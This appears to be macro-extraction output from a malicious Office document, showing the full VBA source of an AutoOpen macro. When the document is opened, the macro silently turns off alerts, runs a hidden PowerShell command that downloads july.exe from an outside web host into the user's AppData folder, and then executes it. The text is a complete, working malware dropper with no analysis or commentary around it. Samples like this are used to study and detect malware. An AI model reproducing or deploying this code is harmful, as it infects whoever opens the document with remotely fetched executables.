Filename     : ./macros/cc1f4506d0190bbb55fb56e970aefd75f255f7d7e1008a023971db23033ba573
OLE stream   : VBA/AutoOpen2
VBA filename : AutoOpen2.bas
----------------------------------------
Attribute VB_Name = "AutoOpen2"
Sub AutoOpen()
Application.DisplayAlerts = False

'//Server for .Jar file
Dim WshShell, scriptPath, WshShellExec, strOutput
strCommand = "powershell -WindowStyle Hidden  -Command  ""(New-Object Net.WebClient).DownloadFile('http://vanlizza-chau.com/fest/july.exe', '%appdata%\july.exe')"""

    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    WshShell.Run ("%appdata%\july.exe")
    
End Sub
